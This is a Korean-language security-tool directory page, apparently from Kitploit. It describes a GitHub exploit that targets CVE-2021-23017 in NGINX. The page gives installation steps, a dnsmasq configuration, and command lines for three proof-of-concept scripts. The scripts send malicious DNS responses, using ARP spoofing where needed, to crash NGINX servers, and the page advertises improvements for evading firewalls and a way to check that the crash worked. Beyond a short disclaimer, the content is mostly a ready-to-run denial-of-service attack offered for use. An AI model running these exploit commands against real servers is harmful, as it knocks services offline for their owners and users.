Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
EVIL-CVE-2021-23017-Update-2025 — NGINX 서버(버전 0.6.18–1.20.0)의 취약점. 스크립트는 악의적인 DNS 응답을 전송하여 서비스 거부(DoS)를 유발하는 것을 목표로 하며, 방화벽을 우회하기 위한 개선 사항이 포함되어 있습니다. | Kitploit
도구/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingDNS Analysis
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

NGINX 서버(버전 0.6.18–1.20.0)의 취약점. 스크립트는 악의적인 DNS 응답을 전송하여 서비스 거부(DoS)를 유발하는 것을 목표로 하며, 방화벽을 우회하기 위한 개선 사항이 포함되어 있습니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
111년 전아직 검토되지 않음
공유

NGINX 서버(버전 0.6.18~1.20.0)의 취약점입니다. 이 스크립트는 악의적인 DNS 응답을 전송하여 서비스 거부(DoS)를 유발하며, 방화벽을 우회하는 기능이 강화되었습니다. 이는 M507/CVE-2021-23017-PoC의 원본 PoC를 개선한 버전입니다.

경고: 시스템 소유자의 명시적인 서면 허가를 받은 경우에만 사용하십시오. 무단 테스트는 불법입니다.

요구 사항

  • 환경: Linux (예: Kali Linux, Termux/가상화 환경).
  • 종속성:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • 네트워크: ARP 스푸핑을 위해 대상과 동일한 서브넷에 있거나, 대상 NGINX가 사용자의 DNS 서버 IP를 사용해야 합니다.

설치

  1. 저장소를 클론합니다:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. dnsmasq를 설정합니다:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    다음을 추가:
    root@kitploit:~
    address=/test.example.com/192.168.1.100
    
    시작:
    root@kitploit:~
    sudo systemctl start dnsmasq
    

기능 설명

  • 악의적인 DNS 응답(긴 도메인 이름 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com)을 전송하여 NGINX 서버를 충돌시킵니다.
  • curl 및 dig를 사용하여 DNS 쿼리를 트리거하여 취약점을 악용합니다.
  • 직접 DNS 패킷을 전송하고 병렬 프로세스를 사용하여 방화벽을 우회합니다.

원본과의 차이점

M507/CVE-2021-23017-PoC와 비교:

  • 향상된 방화벽 우회: poc1.2.3.py에서 병렬 프로세스를 사용하여 동시에 스니핑, DNS 전송, 쿼리 트리거를 수행합니다. 세 가지를 함께 실행해야 합니다.
  • 최적화된 패킷 전달: 더 높은 빈도의 패킷과 쿼리로 방화벽 필터를 회피합니다.
  • 서브넷 확인: ARP 스푸핑을 위한 네트워크 호환성을 확인하여 신뢰성을 향상시킵니다.

사용법

세 가지를 함께 실행하고 적절한 인수로 실행합니다(<target_ip>, <your_dns_server_ip>, <target_url>를 대체하세요).

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • DNS 쿼리를 스니핑하고 응답합니다.

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • 직접 DNS 전송 및 쿼리 트리거를 추가합니다.

poc3.py (권장)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • 최대 효율을 위해 작업을 병렬로 실행합니다.

예시

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

결과 확인

  • 서버 상태 확인:

    root@kitploit:~
    curl -I http://<target_url>
    
    • 성공: 502 Bad Gateway 또는 503 Service Unavailable은 서버 충돌을 나타냅니다.
    • 실패: 200 OK는 취약점이 없거나 방화벽이 차단하고 있음을 나타냅니다.
  • DNS 트래픽 모니터링:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

고지 사항: 교육 목적으로만 사용하십시오. 저자는 오용에 대해 책임을 지지 않습니다.

도구 다운로드